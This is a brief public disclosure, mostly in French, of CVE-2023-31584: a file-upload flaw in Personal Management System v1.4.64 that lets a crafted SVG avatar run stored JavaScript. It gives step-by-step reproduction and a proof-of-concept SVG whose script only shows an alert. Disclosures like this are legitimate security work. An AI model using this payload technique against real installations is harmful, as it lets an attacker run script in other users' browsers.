
Public disclosure for CVE-2023-31584.
Une vulnérabilité de téléchargement arbitraire de fichiers dans Personal Management System v1.4.64 permet à des attaquants d'exécuter du code arbitraire en téléchargeant un fichier SVG manipulé dans l'avatar du profil d'un utilisateur.
[Informations supplémentaires] 1.) Créez alert.svg avec le contenu suivant :
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("huntr.dev");
</script>
</svg>
2.) Hébergez le .SVG sur un serveur web.
3.) Téléchargez le .SVG comme image d'avatar. 4.) Lorsqu'un utilisateur ouvre l'avatar dans un onglet séparé, le javascript stocké dans le fichier .SVG est exécuté.
Références : https://github.com/Volmarg/personal-management-system